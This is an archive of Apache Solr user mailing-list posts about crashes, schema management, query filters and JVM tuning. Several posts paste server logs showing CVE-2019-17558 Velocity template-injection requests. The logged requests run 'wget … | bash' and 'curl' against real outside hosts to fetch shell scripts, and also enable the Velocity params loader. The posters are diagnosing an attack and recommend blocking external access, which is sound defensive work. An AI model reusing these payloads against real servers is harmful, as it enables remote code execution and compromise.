Re: CVE-2019-17558 on SOLR 6.1
(Resending to the list. Sorry, Rick.) FYI, my client was using 8.3.1, which should have mitigated the attack. But the server was suffering a sudden death of the Solr process, and the log showed it was being attacked using CVE-2019-17558. We blocked the external access of Solr API. Then this sudden death ended. So I tend to think just disabling the Velocity engine might not enough. Of course there is a possibility that this server was also getting a different kind of attack. We don't know. But in general, the Solr port should be closed from external access. TK On 2/12/21 10:17 AM, Rick Tham wrote: We are using Solr 6.1 and at the moment we can not upgrade due to application dependencies. We have mitigation steps in place to only trust specific machines within our DMZ. I am trying to figure out if the following is an additioanal valid mitigation step for CVE-2019-17558 on SOLR 6.1. None of our solrconfig.xml contains the lib references to the velocity jar files as follows: l It doesn't appear that you can add these jars references using the config API. Without these references, you are not able to flip the params.resource.loader.enabled to true using the config API. If you are not able to flip the flag and none of your cores have these lib references then is the risk present? Thanks in advance!
Re: SolrCloud keeps crashing
Oops, I should have referenced this document rather: https://www.tenable.com/cve/CVE-2019-17558 <https://www.tenable.com/cve/CVE-2019-17558> On 2/3/21 2:42 PM, TK Solr wrote: Victor & Satish, Is your Solr accessible from the Internet by anyone? If so, your site is being attacked by a bot using this security hole: https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability If that is the case, try blocking the Solr port from the Internet. My client's Solr was experiencing the sudden death syndrome. In the log, there were strange queries very similar to what you have here: webapp=/solr path=/select params={*q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity*} status=400 QTime=1 2020-12-20 08:49:07.029 INFO (qtp401424608-8687) [c:sitecore_submittals_index s:shard1 r:core_node1 x:sitecore_submittals_index_shard1_replica3] o.a.s.c.PluginBag Going to create a new queryResponseWriter with {type = queryResponseWriter,name = velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = {startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}} We configured the firewall to block the Solr port. After that, my client's Solr node has been running for 4 weeks so far. I think this security hole doesn't just leak the information but it can also kill the Solr process. TK
Re: SolrCloud keeps crashing
Victor & Satish, Is your Solr accessible from the Internet by anyone? If so, your site is being attacked by a bot using this security hole: https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability If that is the case, try blocking the Solr port from the Internet. My client's Solr was experiencing the sudden death syndrome. In the log, there were strange queries very similar to what you have here: webapp=/solr path=/select params={*q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity*} status=400 QTime=1 2020-12-20 08:49:07.029 INFO (qtp401424608-8687) [c:sitecore_submittals_index s:shard1 r:core_node1 x:sitecore_submittals_index_shard1_replica3] o.a.s.c.PluginBag Going to create a new queryResponseWriter with {type = queryResponseWriter,name = velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = {startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}} We configured the firewall to block the Solr port. After that, my client's Solr node has been running for 4 weeks so far. I think this security hole doesn't just leak the information but it can also kill the Solr process. TK
Run multiple (different) Solr versions on a server
Hi all, is it possible to run multiple (different) Solr versions on a (Debian) server? For development and production purposes I'd like to run - a development version (Solr 8.7.0) and - a productive version (Solr 7.4.0). Which settings are available/necessary? Thanks Walter Claassen
Re: "Failed to reserve shared memory."
I added these lines to solr.in.sh and restarted Solr: GC_TUNE=('-XX:+UseG1GC' \ '-XX:+PerfDisableSharedMem' \ '-XX:+ParallelRefProcEnabled' \ '-XX:MaxGCPauseMillis=250' \ '-XX:+AlwaysPreTouch' \ '-XX:+ExplicitGCInvokesConcurrent') According to the Admin UI, -XX:+UseLargePage is gone, which is good but all other -XX:* except -XX:+UseG1GC are also gone. What is the correct way to remove just -XX:UseLargePage ? TK On 1/6/21 3:42 PM, TK Solr wrote: My client is having a sudden death syndrome of Solr 8.3.1. Solr stops responding suddenly and they have to restart Solr. (It is not clear if the Solr/jetty process was dead or alive but not responding. The OOM log isn't found.) In the Solr start up log, these three error messages were found: OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 1) OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12) OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12) I am wondering if anyone has seen these errors. I found this article https://stackoverflow.com/questions/45968433/java-hotspottm-64-bit-server-vm-warning-failed-to-reserve-shared-memory-er which suggests removal of the JVM option -XX:+UseLargePage, which is added by bin/solr script if GC_TUNE is not defined. Would that be a good idea? I'm not quite sure what kind of variable GC_TUNE is. It is used as in: if [ -z ${GC_TUNE+x} ]; then ... '-XX:+AlwaysPreTouch') else GC_TUNE=($GC_TUNE) fi I'm not familiar with *${*GC_TUNES*+x}* and*($*GC_TUNE*)* syntax. Is this a special kind of environmental variable? TK
Re: The x: prefix for the core name and 'custom.vm' errors in Admin UI's Logging tab
Please disregard my previous post. I understand these are actual error messages, not the errors of handling Admin UI. I think this server is being attacked using the vulnerability described here https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability Fortunately the attack isn't succeeding because of SOLR-13971 fix, and instead it is causing these errors. I'll fortify the Solr access. On 1/7/21 11:02 AM, TK Solr wrote: On the Admin UI's login screen, when the Logging tab is clicked, I see lines like: Time(Local) Level Core Logger Message 1/7/2021 ERROR x:mycore loader ResourceManager: unable to find resource 'custom.vm' in any resource loader. 8:41:46 AM false 1/7/2021 ERROR x:mycore HttpSolrCall null:java.io.IOException: Unable to find resource 'custom.vm' 8:41:46 AM false If I click on the info icon (circled "i"), this is displayed. null:java.io.IOException: Unable to find resource 'custom.vm' at org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374) at org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152) at org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65) at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892) at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594) at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419) at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351) at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602) ... Are these errors from the Admin UI code itself? Does the Admin UI use Velocity? (I thought it might be a library path issue but I don't see 'custom.vm' anywhere in the Solr source code.) What does "x:" prefix to the core name mean? What does "false" under the log level mean? The Solr I'm using is 8.3.1 using openJDK 11 on Ubuntu 18.04.3. TK
The x: prefix for the core name and 'custom.vm' errors in Admin UI's Logging tab
On the Admin UI's login screen, when the Logging tab is clicked, I see lines like: Time(Local) Level Core Logger Message 1/7/2021 ERROR x:mycoreloader ResourceManager: unable to find resource 'custom.vm' in any resource loader. 8:41:46 AM false 1/7/2021 ERROR x:mycoreHttpSolrCall null:java.io.IOException: Unable to find resource 'custom.vm' 8:41:46 AM false If I click on the info icon (circled "i"), this is displayed. null:java.io.IOException: Unable to find resource 'custom.vm' at org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374) at org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152) at org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65) at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892) at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594) at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419) at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351) at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602) ... Are these errors from the Admin UI code itself? Does the Admin UI use Velocity? (I thought it might be a library path issue but I don't see 'custom.vm' anywhere in the Solr source code.) What does "x:" prefix to the core name mean? What does "false" under the log level mean? The Solr I'm using is 8.3.1 using openJDK 11 on Ubuntu 18.04.3. TK
"Failed to reserve shared memory."
My client is having a sudden death syndrome of Solr 8.3.1. Solr stops responding suddenly and they have to restart Solr. (It is not clear if the Solr/jetty process was dead or alive but not responding. The OOM log isn't found.) In the Solr start up log, these three error messages were found: OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 1) OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12) OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12) I am wondering if anyone has seen these errors. I found this article https://stackoverflow.com/questions/45968433/java-hotspottm-64-bit-server-vm-warning-failed-to-reserve-shared-memory-er which suggests removal of the JVM option -XX:+UseLargePage, which is added by bin/solr script if GC_TUNE is not defined. Would that be a good idea? I'm not quite sure what kind of variable GC_TUNE is. It is used as in: if [ -z ${GC_TUNE+x} ]; then ... '-XX:+AlwaysPreTouch') else GC_TUNE=($GC_TUNE) fi I'm not familiar with *${*GC_TUNES*+x}* and*($*GC_TUNE*)* syntax. Is this a special kind of environmental variable? TK
Java Streaming API - nested Hashjoins with zk and accesstoken
Hi All, I need to combine 3 different documents using hashjoin. I am using below query(ignore placeholder queries): hashJoin(hashJoin(search(collectionName,q="*:*",fl="id",qt="/export",sort="id desc"), hashed = select(search(collectionName,q="*:*",fl="id",qt="/export",sort="id asc")),on="id"), hashed = select(search(collectionName,q="*:*",fl="id",qt="/export",sort="id asc")),on="id") This works with simple TupleStream in java. But I also need to pass auth token on zk. So I have to use below code: ZkClientClusterStateProvider zkCluster = new ZkClientClusterStateProvider(zkHosts, null); SolrZkClient zkServer = zkCluster.getZkStateReader().getZkClient(); StreamFactory streamFactory = new StreamFactory().withCollectionZkHost("collectionName"), zkServer.getZkServerAddress()) .withFunctionName("search", CloudSolrStream.class) .withFunctionName("hashJoin", HashJoinStream.class) .withFunctionName("select", SelectStream.class); try (HashJoinStream hashJoinStream = (HashJoinStream)streamFactory.constructStream(expr);){} Issue is one hashjoin with nested select and search works fine with this api. But the multiple hashjoin is not completing the task. I can see expression is correctly parsed, but its waiting indefinitely to complete the thread. Any help is appreciated. Thanks, Anamika
Re: ReversedWildcardFilter - should it be applied only at the index time?
It doesn't tell much: "debug":{ "rawquerystring":"email:*@aol.com", "querystring":"email:*@aol.com", "parsedquery":"(email:*@aol.com)", "parsedquery_toString":"email:*@aol.com", "explain":{ "11d6e092-58b5-4c1b-83bc-f3b37e0797fd":{ "match":true, "value":1.0, "description":"email:*@aol.com"}, The email field uses ReversedWildcardFilter for both indexing and query. On 4/15/20 12:04 PM, Erick Erickson wrote: What do you see if you add =query? That should tell you…. Best, Erick On Apr 15, 2020, at 2:40 PM, TK Solr wrote: Thank you. Is there any harm if I use it on the query side too? In my case it seems working OK (even with withOriginal="false"), and even faster. I see the query parser code is taking a look at index analyzer and applying ReversedWildcardFilter at query time. But I didn't quite understand what happens if the query analyzer also uses ReversedWildcardFilter. On 4/15/20 1:51 AM, Colvin Cowie wrote: You only need apply it in the index analyzer: https://lucene.apache.org/solr/8_4_0/solr-core/org/apache/solr/analysis/ReversedWildcardFilterFactory.html If it appears in the index analyzer, the query part of it is automatically applied at query time. The ReversedWildcardFilter indexes *every* token in reverse, with a special character at the start ('\u0001' I believe) to avoid false positive matches when the query term isn't reversed (e.g. if the term being indexed is mar, then the reversed token would be \u0001ram, so a search for 'ram' wouldn't accidentally match that). If *withOriginal* is set to true then it will reverse the normal token as well as the reversed token. On Thu, 9 Apr 2020 at 02:27, TK Solr wrote: I experimented with the index-time only use of ReversedWildcardFilter and the both time use. My result shows using ReverseWildcardFilter both times runs twice as fast but my dataset is not very large (in the order of 10k docs), so I'm not sure if I can make a conclusion. On 4/8/20 2:49 PM, TK Solr wrote: In the usage example shown in ReversedWildcardFilter < https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter> in Solr Ref Guide, and only usage find in managed-schema to define text_general_rev, the filter is used only for indexing. maxPosQuestion="2" maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/> Is it incorrect to use the same analyzer for query like? maxPosQuestion="0" maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/> In the description of filter, I see "Tokens without wildcards are not reversed." But the wildcard appears only in the query string. How can ReversedWildcardFilter know if the wildcard is being used if the filter is used only at the indexing time? TK
Re: ReversedWildcardFilter - should it be applied only at the index time?
Thank you. Is there any harm if I use it on the query side too? In my case it seems working OK (even with withOriginal="false"), and even faster. I see the query parser code is taking a look at index analyzer and applying ReversedWildcardFilter at query time. But I didn't quite understand what happens if the query analyzer also uses ReversedWildcardFilter. On 4/15/20 1:51 AM, Colvin Cowie wrote: You only need apply it in the index analyzer: https://lucene.apache.org/solr/8_4_0/solr-core/org/apache/solr/analysis/ReversedWildcardFilterFactory.html If it appears in the index analyzer, the query part of it is automatically applied at query time. The ReversedWildcardFilter indexes *every* token in reverse, with a special character at the start ('\u0001' I believe) to avoid false positive matches when the query term isn't reversed (e.g. if the term being indexed is mar, then the reversed token would be \u0001ram, so a search for 'ram' wouldn't accidentally match that). If *withOriginal* is set to true then it will reverse the normal token as well as the reversed token. On Thu, 9 Apr 2020 at 02:27, TK Solr wrote: I experimented with the index-time only use of ReversedWildcardFilter and the both time use. My result shows using ReverseWildcardFilter both times runs twice as fast but my dataset is not very large (in the order of 10k docs), so I'm not sure if I can make a conclusion. On 4/8/20 2:49 PM, TK Solr wrote: In the usage example shown in ReversedWildcardFilter < https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter> in Solr Ref Guide, and only usage find in managed-schema to define text_general_rev, the filter is used only for indexing. maxPosQuestion="2" maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/> Is it incorrect to use the same analyzer for query like? maxPosQuestion="0" maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/> In the description of filter, I see "Tokens without wildcards are not reversed." But the wildcard appears only in the query string. How can ReversedWildcardFilter know if the wildcard is being used if the filter is used only at the indexing time? TK
Re: ReversedWildcardFilter - should it be applied only at the index time?
I experimented with the index-time only use of ReversedWildcardFilter and the both time use. My result shows using ReverseWildcardFilter both times runs twice as fast but my dataset is not very large (in the order of 10k docs), so I'm not sure if I can make a conclusion. On 4/8/20 2:49 PM, TK Solr wrote: In the usage example shown in ReversedWildcardFilter <https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter> in Solr Ref Guide, and only usage find in managed-schema to define text_general_rev, the filter is used only for indexing. positionIncrementGap="100"> ignoreCase="true"/> maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/> ignoreCase="true" synonyms="synonyms.txt"/> ignoreCase="true"/> Is it incorrect to use the same analyzer for query like? positionIncrementGap="100"> maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/> In the description of filter, I see "Tokens without wildcards are not reversed." But the wildcard appears only in the query string. How can ReversedWildcardFilter know if the wildcard is being used if the filter is used only at the indexing time? TK
ReversedWildcardFilter - should it be applied only at the index time?
In the usage example shown in ReversedWildcardFilter <https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter> in Solr Ref Guide, and only usage find in managed-schema to define text_general_rev, the filter is used only for indexing. positionIncrementGap="100"> ignoreCase="true"/> maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/> ignoreCase="true" synonyms="synonyms.txt"/> ignoreCase="true"/> Is it incorrect to use the same analyzer for query like? positionIncrementGap="100"> maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/> In the description of filter, I see "Tokens without wildcards are not reversed." But the wildcard appears only in the query string. How can ReversedWildcardFilter know if the wildcard is being used if the filter is used only at the indexing time? TK
Re: Spellcheck on specified fields?
Correction. "mark seattle" query doesn't show suggestions since "mark" alone has some hits. It is when the same logic is used for a single term query of "seatle" that 3 suggestions of "seattle" are returned. Do I have to identify the field by using startOffset value? On 4/7/20 3:46 PM, TK Solr wrote: I query on multiple field like: q=city:(mark seattle) name:(mark seattle) phone:(mark seattle)=true The raw query terms are distributed to all fields because I don't know what term is intended to for which field. If I misspell seattle, I get 3 suggestions: "spellcheck":{ "suggestions":[ "seatle",{ "numFound":1, "startOffset":29, "endOffset":35, "suggestion":["seattle"]}, "seatle",{ "numFound":1, "startOffset":50, "endOffset":56, "suggestion":["seattle"]}, "seatle",{ "numFound":1, "startOffset":73, "endOffset":79, "suggestion":["seattle"]}]}} (Please disregard exact numbers. It's from more complicated query of the same nature.) I think it's showing a correction suggestion for each query field. Since the phone field keeps a phone number and spelling corrections are not very useful, I would like the spellchecker to skip this and similar fields but I don't see a relevant parameter in spellchecker's documentation. Is there any way to specify the fields I am interested or I am not interested? TK
Spellcheck on specified fields?
I query on multiple field like: q=city:(mark seattle) name:(mark seattle) phone:(mark seattle)=true The raw query terms are distributed to all fields because I don't know what term is intended to for which field. If I misspell seattle, I get 3 suggestions: "spellcheck":{ "suggestions":[ "seatle",{ "numFound":1, "startOffset":29, "endOffset":35, "suggestion":["seattle"]}, "seatle",{ "numFound":1, "startOffset":50, "endOffset":56, "suggestion":["seattle"]}, "seatle",{ "numFound":1, "startOffset":73, "endOffset":79, "suggestion":["seattle"]}]}} (Please disregard exact numbers. It's from more complicated query of the same nature.) I think it's showing a correction suggestion for each query field. Since the phone field keeps a phone number and spelling corrections are not very useful, I would like the spellchecker to skip this and similar fields but I don't see a relevant parameter in spellchecker's documentation. Is there any way to specify the fields I am interested or I am not interested? TK
Proper way to manage managed-schema file
I am using Solr 8.3.1 in non-SolrCloud mode (what should I call this mode?) and modifying managed-schema. I noticed that Solr does override this file wiping out all my comments and rearranging the order. I noticed there is a "DO NOT EDIT" comment. Then, what is the proper/expected way to manage this file? Admin UI can add fields but cannot edit existing one or add new field types. Do I keep a script of many schema calls? (Then how do I reset the default to the initial one, which would be needed before re-re-playing the schema calls.) TK
Re: Admin UI core loading fails
I failed to include this line in my first post. This /select call with strange parameters (q=1) seems to be happening periodically even when I don't do any operation on Admin UI. I scanned the Solr source code, /opt/solr and /var/solr/data and I couldn't find the source of this call. 2020-04-04 00:41:02.604 INFO (qtp231311211-24) [ x:my_core] o.a.s.c.S.Request [my_core] webapp=/solr path=/select params={*q=1*=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('curl+-o+/tmp/zzz+217.12.209.234/s.sh'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity} hits=0 status=0 QTime=1 On 4/2/20 12:50 AM, TK Solr wrote: I'm on Solr 8.3.1 running in non-solrcloud mode. When I tried to reload an existing core from Admin UI's "Core Admin" by clicking Reload, after modifying the core's conf/managed-schema, no error was reported. But the newly added field type is not shown in the core's Analyzer section. I selected Logging from the side bar, I saw errors like this for every core, not just the core I tried to reload. null:java.io.IOException: Unable to find resource 'custom.vm' at org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374) at org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152) at org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65) at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892) at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594) at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419) at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351) at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602) at org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:540) I could not find any mention of custom.vm in any files under any core's conf directory. I restarted Solr, the core was loaded without an error and I can see the newly added filed type. What could be the cause of these errors that only happens with the Reload button? TK
Re: Admin UI core loading fails
On 4/2/20 5:39 AM, Erick Erickson wrote: What do your Solr logs show? My bet is that your mods to the configs somehow caused the reload to fail too early in the process to be shown in the UI. These are the lines in solr.log that I see lead to the stack trace (core name has been modified to my_core). I don't understand why Velocity is involved. Is it used by Admin UI? 2020-04-02 02:16:33.851 INFO (qtp429353573-15) [ x:my_core] o.a.s.h.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-queryresponsewriter":{ "startup":"lazy", "name":"velocity", "class":"solr.VelocityResponseWriter", "template.base.dir":"", "solr.resource.loader.enabled":"true", "params.resource.loader.enabled":"true"}}] 2020-04-02 02:16:33.854 INFO (qtp429353573-15) [ x:my_core] o.a.s.c.S.Request [my_core] webapp=/solr path=/config params={} status=0 QTime=487 2020-04-02 02:16:33.854 INFO (qtp429353573-15) [ x:my_core] o.a.s.c.SolrCore [my_core] CLOSING SolrCore org.apache.solr.core.SolrCore@7b0eae1f 2020-04-02 02:16:33.855 INFO (qtp429353573-15) [ x:my_core] o.a.s.m.SolrMetricManager Closing metric reporters for registry=solr.core.my_core, tag=SolrCore@7b0eae1f 2020-04-02 02:16:33.855 INFO (qtp429353573-15) [ x:my_core] o.a.s.m.r.SolrJmxReporter Closing reporter [org.apache.solr.metrics.reporters.SolrJmxReporter@2f090079: rootName = null, domain = solr.core.my_core, service url = null, agent id = null] for registry solr.core.my_core / com.codahale.metrics.MetricRegistry@4125989a 2020-04-02 02:16:33.858 INFO (searcherExecutor-29-thread-1-processing-x:my_core) [ x:my_core] o.a.s.c.SolrCore [my_core] Registered new searcher Searcher@45a874aa[my_core] main{ExitableDirectoryReader(UninvertingDirectoryReader(Uninverting(_0(8.3.1):C55967:[diagnostics={java.vendor=Ubuntu, os=Linux, java.version=11.0.6, java.vm.version=11.0.6+10-post-Ubuntu-1ubuntu118.04.1, lucene.version=8.3.1, os.arch=amd64, java.runtime.version=11.0.6+10-post-Ubuntu-1ubuntu118.04.1, source=flush, os.version=4.15.0-76-generic, timestamp=1585790971495}]:[attributes={Lucene50StoredFieldsFormat.mode=BEST_SPEED}])))} 2020-04-02 02:16:34.105 INFO (qtp429353573-17) [ x:my_core] o.a.s.c.S.Request [my_core] webapp=/solr path=/select params={q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('rm+-rf+/tmp/zzz'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity} hits=0 status=0 QTime=1 2020-04-02 02:16:34.106 INFO (qtp429353573-17) [ x:my_core] o.a.s.c.PluginBag Going to create a new queryResponseWriter with {type = queryResponseWriter,name = velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = {startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}} 2020-04-02 02:16:34.276 ERROR (qtp429353573-17) [ x:my_core] o.a.v.loader ResourceManager: unable to find resource 'custom.vm' in any resource loader. 2020-04-02 02:16:34.276 ERROR (qtp429353573-17) [ x:my_core] o.a.s.s.HttpSolrCall null:java.io.IOException: Unable to find resource 'custom.vm' Best, Erick On Apr 2, 2020, at 02:50, TK Solr wrote: I'm on Solr 8.3.1 running in non-solrcloud mode. When I tried to reload an existing core from Admin UI's "Core Admin" by clicking Reload, after modifying the core's conf/managed-schema, no error was reported. But the newly added field type is not shown in the core's Analyzer section. I selected Logging from the side bar, I saw errors like this for every core, not just the core I tried to reload. null:java.io.IOException: Unable to find resource 'custom.vm' at org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374) at org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152) at org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65) at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892) at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594) at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419) at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351) at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602) at org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandle
Admin UI core loading fails
I'm on Solr 8.3.1 running in non-solrcloud mode. When I tried to reload an existing core from Admin UI's "Core Admin" by clicking Reload, after modifying the core's conf/managed-schema, no error was reported. But the newly added field type is not shown in the core's Analyzer section. I selected Logging from the side bar, I saw errors like this for every core, not just the core I tried to reload. null:java.io.IOException: Unable to find resource 'custom.vm' at org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374) at org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152) at org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65) at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892) at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594) at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419) at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351) at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602) at org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:540) I could not find any mention of custom.vm in any files under any core's conf directory. I restarted Solr, the core was loaded without an error and I can see the newly added filed type. What could be the cause of these errors that only happens with the Reload button? TK
Re: Solr admin interface freezes on Chrome
> Works fine on Firefox, and I > haven't made any changes to our Solr instance (v8.1.1) in a while. Had a co-worker with a similar issue. He had a pop-blocker enabled in chrome that was preventing some resource call (or something similar). When switching to Firefox everything worked without issue. Any chance something is showing in the developer tools console?
Solr standalone timeouts after upgrading to SOLR 7
Hello all, We recently moved to SOLR 7 from SOLR 6 about 2 weeks ago. Once each week (including today) we experienced query timeout issues with corresponding GC events. There was a spike in CPU up to 66% which is not something we previously saw w/ Solr 6. From the SOLR logs it looks like something inside the JVM has happend, SOLR is reporting closed connections from Jetty. Our data size is relatively small but we do run 5 cores within the one Jetty instance. There index sizes are anywhere between 200Mb to 2GB Our memory consumption is relatively low: "free":"296.1 MB", "total":"569.6 MB", "max":"9.6 GB", "used":"273.5 MB (%2.8)", We had a spike in traffic about 5 minutes prior to some longer GC events (similar situation last week). Any help would be appreciated. Below is my current system info along with a GC log snippet and the corresponding SOLR log error. *System info:* AMZ2 linux 8 core 32 GB Mem *Java:* 1.8.0_222-ea 25.222-b03 *Solr: *solr-spec-version":"7.7.2" *Start options: * "-Xms512m", "-Xmx10g", "-XX:NewRatio=3", "-XX:SurvivorRatio=4", "-XX:TargetSurvivorRatio=90", "-XX:MaxTenuringThreshold=8", "-XX:+UseConcMarkSweepGC", "-XX:ConcGCThreads=4", "-XX:ParallelGCThreads=4", "-XX:+CMSScavengeBeforeRemark", "-XX:PretenureSizeThreshold=64m", "-XX:+UseCMSInitiatingOccupancyOnly", "-XX:CMSInitiatingOccupancyFraction=50", "-XX:CMSMaxAbortablePrecleanTime=6000", "-XX:+CMSParallelRemarkEnabled", "-XX:+ParallelRefProcEnabled", "-XX:-OmitStackTraceInFastThrow", "-verbose:gc", "-XX:+PrintHeapAtGC", "-XX:+PrintGCDetails", "-XX:+PrintGCDateStamps", "-XX:+PrintGCTimeStamps", "-XX:+PrintTenuringDistribution", "-XX:+PrintGCApplicationStoppedTime", "-XX:+UseGCLogFileRotation", "-XX:NumberOfGCLogFiles=9", "-XX:GCLogFileSize=20M", "-Xss256k", "-Dsolr.log.muteconsole" Here is an example of from the GC log: 2019-10-02T16:03:15.888+: 265318.624: [Full GC (Allocation Failure) 2019-10-02T16:03:15.888+: 265318.624: [CMS2019-10-02T16:03:16.134+: 26 5318.870: [CMS-concurrent-mark: 1.773/1.783 secs] [Times: user=13.14 sys=0.00, real=1.78 secs] (concurrent mode failure): 7864319K->7864319K(7864320K), 9.5890129 secs] 10048895K->8863021K(10048896K), [Metaspace: 53159K->53159K(1097728K)], 9.5892061 secs] [Times: user=10.31 sys=0.00, real=9.59 secs] Heap after GC invocations=296656 (full 546): par new generation total 2184576K, used 998701K [0x00054000, 0x0005e000, 0x0005e000) eden space 1747712K, 57% used [0x00054000, 0x00057cf4b4f0, 0x0005aaac) from space 436864K, 0% used [0x0005aaac, 0x0005aaac, 0x0005c556) to space 436864K, 0% used [0x0005c556, 0x0005c556, 